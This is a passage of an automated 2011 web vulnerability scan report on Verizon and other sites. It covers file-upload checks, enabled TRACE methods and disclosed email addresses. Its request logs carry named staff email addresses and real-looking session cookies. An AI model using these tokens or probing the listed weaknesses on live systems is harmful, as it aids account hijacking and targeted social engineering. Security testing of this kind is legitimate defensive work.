Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:57 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

18. TRACE method is enabled previous next
There are 2 instances of this issue:

http://s.xp1.ru4.com/
http://www.verizonwireless.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://s.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 7e34168ea95620a7

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:31 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 7e34168ea95620a7; X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1; 1621610-B22941263=0|0|0|0|0|22946267|22
...[SNIP]...

18.2. http://www.verizonwireless.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.verizonwireless.com
Cookie: 7d5371dd4ddf41d

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 05 Sep 2011 22:14:30 GMT
Content-type: message/http
Content-length: 427
Connection: keep-alive

TRACE / HTTP/1.0
Host: www.verizonwireless.com
Cookie: 7d5371dd4ddf41d; JSESSIONIDB2C=j6fhTlJFv6JCWtlSlB7JQG28QLChh2W1b7QTf9cVB51pQnFmLBtG!-1538644045!ozzy!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6575345525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f5
...[SNIP]...

19. Email addresses disclosed previous next
There are 27 instances of this issue:

https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/generalWH.css
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/print.css
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css
http://headlines.verizon.com/headlines/resources/js/tabber_ajax.js
http://newscenter.verizon.com/components/print/printer-friendly.js
http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
http://webmail.verizon.com/signin/
http://webmail.verizon.net/signin/
http://webmail.verizon.net/signin/Login.jsp
http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver
https://www.bbb.org/online/consumer/cks.aspx
http://www.darkreading.com/security/attacks/showArticle.jhtml
https://www.google.com/accounts/ServiceLogin
http://www.verizonbusiness.com/Medium/sign-in/vec/
http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml
http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js
http://www22.verizon.com/content/commontemplates/includes/Javascript/ddpng.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js
https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/generalWH.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/includes/css/generalWH.css

Issue detail

The following email address was disclosed in the response:

katherine.lau@verizonbusiness.com

Request

GET /enterprisesolutions/staticcontent/includes/css/generalWH.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/css
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: W/"2cdb-4e228b00"
Vary: accept-encoding
Cache-Control: private, max-age=22024
Date: Mon, 05 Sep 2011 22:22:40 GMT
Content-Length: 11483
Connection: keep-alive

/*-- Verizon Business Proprietary and Confidential --*/
/*-- Verizon Business Customer Center **** GENERAL CSS v1.6 --*/
/*-----------------------------------------------------*/
/* -- last updated 12/07/10 -----------------*/
/* Do NOT use inline styles or make changes to this file.
   Email Kathy Lau (katherine.lau@verizonbusiness.com to request changes */

/* -- General Formatting ------------------------------------------------------------ */
* {
   margin: 0;
   padding: 0;
}
/* special id for the body tag of an iFrame */
#iframe{

...[SNIP]...

19.2. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/includes/css/print.css

Issue detail

The following email address was disclosed in the response:

kathy.lau@core.verizon.com

Request

GET /enterprisesolutions/staticcontent/includes/css/print.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/css
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: W/"3a7-4e228b00"
Vary: accept-encoding
Content-Length: 935
Date: Mon, 05 Sep 2011 22:22:50 GMT
Connection: keep-alive

/*-- Verizon Business Proprietary and Confidential --*/
/*-- PRINT CSS - should be included on all pages --*/
/*-- Hides certain elements when printing --*/
/* -- last updated 5/12/08 ---*/
/* Do NOT use inline styles or make changes to this file.
Email Kathy Lau (kathy.lau@core.verizon.com to request changes */

/* ------ Header Classes ------ */
#headerNavTop, #headerBkgrd, #headerTabs, #headerBkgrdAnon, #loginBkgrd, .headerNavBkg { display:none;}

/* ------ CONTENT SPECIFIC styles -
...[SNIP]...

19.3. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css

Issue detail

The following email address was disclosed in the response:

katherine.lau@verizonbusiness.com

Request

GET /enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/css
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: W/"d1ad-4e228b00"
Vary: accept-encoding
Content-Length: 53677
Date: Mon, 05 Sep 2011 22:22:40 GMT
Connection: keep-alive

/*-- Verizon Business Proprietary and Confidential --*/
/*-- DEFAULT THEME for VEC: includes Launched app, popup, header, footer, buttons, tabs, box color styles --*/
/*-- Must be used along with generalWH.css to ensure proper page display --*/
/* --v1.16 last updated 12/07/10 ---*/

/* Do NOT use inline styles or make changes to this file.
   Email Kathy Lau (katherine.lau@verizonbusiness.com to request changes */

/* vzb.com progress bar style */
.vzbProgBar{
   position:relative;
   width: 100%;
   overflow:hidden;
   margin-bottom: 20px;
}
.vzbProgBar ul{
   clear:left;
   padding: 0;
   list-style:
...[SNIP]...

19.4. http://headlines.verizon.com/headlines/resources/js/tabber_ajax.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/js/tabber_ajax.js

Issue detail

The following email address was disclosed in the response:

pat@barelyfitz.com

Request

GET /headlines/resources/js/tabber_ajax.js HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 29 Dec 2007 03:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/x-javascript
Content-Length: 16051
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Vary: Accept-Encoding

/*==================================================
$Id: tabber_ajax.js,v 1.2 2007/12/28 21:31:30 lmehta Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fi
...[SNIP]...

19.5. http://newscenter.verizon.com/components/print/printer-friendly.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/components/print/printer-friendly.js

Issue detail

The following email address was disclosed in the response:

mpih@getactive.com

Request

GET /components/print/printer-friendly.js HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 161
Date: Mon, 05 Sep 2011 22:40:34 GMT
Cache-Control: public
Content-Length: 1523
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "+svswbyfZ0o"
Server: Resin/3.1.8
Last-Modified: Thu, 03 Sep 2009 05:05:22 GMT
Content-Type: application/x-javascript; charset=UTF-8

/**
* @author Michael Pih (mpih@getactive.com)
* @version $Id: printer-friendly.js,v 1.2 2009/08/13 05:53:20 mpih Exp $
**/

/**
* Redirects or pops open a new window to the printer-friendly mode of the page.
* The original request URI and
...[SNIP]...

19.6. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/fact-sheets/verizon-high-speed-internet.html

Issue detail

The following email addresses were disclosed in the response:

bob.elek@verizon.com
william.kula@verizon.com

Request

Response

19.7. http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://surround.verizon.com
Path:	/Shop/Utilities/verizonyourdomain.aspx

Issue detail

The following email address was disclosed in the response:

you@yourname.com

Request

Response

19.8. http://webmail.verizon.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.com
Path:	/signin/

Issue detail

The following email address was disclosed in the response:

jdoe@verizon.net

Request

Response

19.9. http://webmail.verizon.net/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/

Issue detail

The following email address was disclosed in the response:

jdoe@verizon.net

Request

Response

19.10. http://webmail.verizon.net/signin/Login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/Login.jsp

Issue detail

The following email addresses were disclosed in the response:

jdoe@verizon.net
you@thenameyouwanted.com

Request

Response

19.11. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/webmail/servlet/HttpNimletDriver

Issue detail

The following email addresses were disclosed in the response:

myalias@bellatlantic.net
myalias@gte.net
username@mycompany.com
username@verizon.net

Request

Response

19.12. https://www.bbb.org/online/consumer/cks.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bbb.org
Path:	/online/consumer/cks.aspx

Issue detail

The following email address was disclosed in the response:

infringement@council.bbb.org

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:36:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
B
...[SNIP]...
<a href="mailto:infringement@council.bbb.org?subject= Misuse of BBBOnLine Seals">
infringement@council.bbb.org</a>
...[SNIP]...

19.13. http://www.darkreading.com/security/attacks/showArticle.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.darkreading.com
Path:	/security/attacks/showArticle.jhtml

Issue detail

The following email addresses were disclosed in the response:

editors@darkreading.com
feedback@techweb.com

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.14. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

pat@example.com

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:nej40pZ-DDJ9AuDvMixEXuI_isIpQw:dizilfo2QNAghruN;Path=/accounts;Expires=Wed, 04-Sep-2013 22:36:17 GMT;Secure;HttpOnly
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 05 Sep 2011 22:36:17 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11099
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

19.15. http://www.verizonbusiness.com/Medium/sign-in/vec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

19.16. http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/basic.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "efabc9eb5d40da22e2cb4cf79593e04e"
Last-Modified: Mon, 05 Sep 2011 22:22:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 23484
Date: Mon, 05 Sep 2011 22:22:29 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:29 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.17. http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/essentials.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:14 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "9fc0b24323db5f76be4b1cfc3dd676c8"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 26281
Date: Mon, 05 Sep 2011 22:22:14 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:14 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.18. http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/igus.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "10b85a197b72ecf9f7e34e76c23b568f"
Last-Modified: Mon, 05 Sep 2011 22:23:12 GMT
Vary: *
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 22693
Date: Mon, 05 Sep 2011 22:23:12 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:23:12 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a class="box" target="_blank" href="mailto:vec-support@verizonbusiness.com">
...[SNIP]...

19.19. http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/looking.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "fc491c0b43858ff0d9914c34c0d12332"
Last-Modified: Mon, 05 Sep 2011 22:25:31 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 21785
Date: Mon, 05 Sep 2011 22:25:31 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:25:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
